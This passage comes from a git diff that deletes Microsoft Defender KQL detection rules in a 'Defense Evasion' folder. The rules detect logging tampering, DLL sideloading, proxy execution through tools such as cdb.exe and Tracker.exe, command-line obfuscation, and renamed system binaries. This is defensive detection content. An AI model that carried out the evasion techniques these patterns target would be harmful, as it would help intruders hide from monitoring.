"\\SaveZoneInformation") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\ScanWithAntiVirus")) \ No newline at end of file diff --git a/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql b/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql deleted file mode 100644 index e86a83a1..00000000 --- a/Defense Evasion/Potential_AutoLogger_Sessions_Tampering.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: high -// Description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where (RegistryKey contains "\\System\\CurrentControlSet\\Control\\WMI\\Autologger" and (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\EventLog-" or RegistryKey contains "\\Defender") and (RegistryKey endswith "\\Enable" or RegistryKey endswith "\\Start"))) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql b/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql deleted file mode 100644 index 49da9307..00000000 --- a/Defense Evasion/Potential_Azure_Browser_SSO_Abuse.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Den Iuzvyk -// Date: 2020/07/15 -// Level: low -// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. -An attacker can use this to authenticate to Azure AD in a browser as that user. - -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql b/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql deleted file mode 100644 index e33493d3..00000000 --- a/Defense Evasion/Potential_Binary_Impersonating_Sysinternals_Tools.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/20 -// Level: medium -// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe") and (not((isnull(ProcessVersionInfoCompanyName) or (ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals"))))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql b/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql deleted file mode 100644 index 17de2322..00000000 --- a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/26 -// Level: medium -// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file -// Tags: attack.execution, attack.t1106, attack.defense_evasion, attack.t1218, attack.t1127 -DeviceProcessEvents -| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql b/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql deleted file mode 100644 index 0a63b246..00000000 --- a/Defense Evasion/Potential_Binary_Proxy_Execution_Via_VSDiagnostics.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql b/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql deleted file mode 100644 index 1c5d0f3d..00000000 --- a/Defense Evasion/Potential_CCleanerDU.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerDU.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql deleted file mode 100644 index 7d335d90..00000000 --- a/Defense Evasion/Potential_CCleanerReactivator.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/07/13 -// Level: medium -// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql deleted file mode 100644 index 4ca5d408..00000000 --- a/Defense Evasion/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql b/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql deleted file mode 100644 index 69960a71..00000000 --- a/Defense Evasion/Potential_Command_Line_Path_Traversal_Evasion_Attempt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/10/26 -// Level: medium -// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql b/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql deleted file mode 100644 index cffa5dcf..00000000 --- a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: juju4 -// Date: 2018/12/11 -// Level: medium -// Description: Detects potential commandline obfuscation using known escape characters -// Tags: attack.defense_evasion, attack.t1140 -DeviceProcessEvents -| where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p" \ No newline at end of file diff --git a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql b/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql deleted file mode 100644 index 2dc00551..00000000 --- a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022/01/15 -// Level: high -// Description: Detects potential commandline obfuscation using unicode characters. -Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. - -// Tags: attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "â" or ProcessCommandLine contains "€" or ProcessCommandLine contains "£" or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "µ" or ProcessCommandLine contains "¶") or (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ") or (ProcessCommandLine contains "―" or ProcessCommandLine contains "—") or (ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄") \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql b/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql deleted file mode 100644 index 598a6653..00000000 --- a/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Avneet Singh @v3t0_, oscd.community -// Date: 2020/10/18 -// Level: medium -// Description: Detects potential DLL injection and execution using "Tracker.exe" -// Tags: attack.defense_evasion, attack.t1055.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql deleted file mode 100644 index 7d53df8f..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbgcore.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll")) \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql deleted file mode 100644 index 85e52e34..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/10/25 -// Level: medium -// Description: Detects DLL sideloading of "dbghelp.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql deleted file mode 100644 index bafb67b9..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: medium -// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe")) \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql b/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql deleted file mode 100644 index 4c46541b..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/31 -// Level: medium -// Description: Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. -// Tags: attack.defense_evasion, attack.t1218, attack.t1055 -DeviceImageLoadEvents -| where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql deleted file mode 100644 index d6f4a3c3..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/13 -// Level: medium -// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql deleted file mode 100644 index 7c55658c..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: @gott_cyber -// Date: 2022/08/29 -// Level: medium -// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". -Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter - -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceProcessEvents -| where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql deleted file mode 100644 index 4d8a43ae..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/12/14 -// Level: medium -// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql deleted file mode 100644 index 418f4c38..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/02 -// Level: high -// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\")) \ No newline at end of file diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql deleted file mode 100644 index 05e33118..00000000 --- a/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) -// Date: 2022/12/16 -// Level: high -// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\") \ No newline at end of file diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql deleted file mode 100644 index e1088872..00000000 --- a/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades) -// Date: 2019/06/15 -// Level: medium -// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. -// Tags: attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql deleted file mode 100644 index 9b1bd1ff..00000000 --- a/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113 -// Date: 2019/06/15 -// Level: high -// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. -// Tags: attack.defense_evasion, attack.t1036.003, car.2013-05-009 -DeviceProcessEvents -| where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "mshta.exe", "msiexec.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath 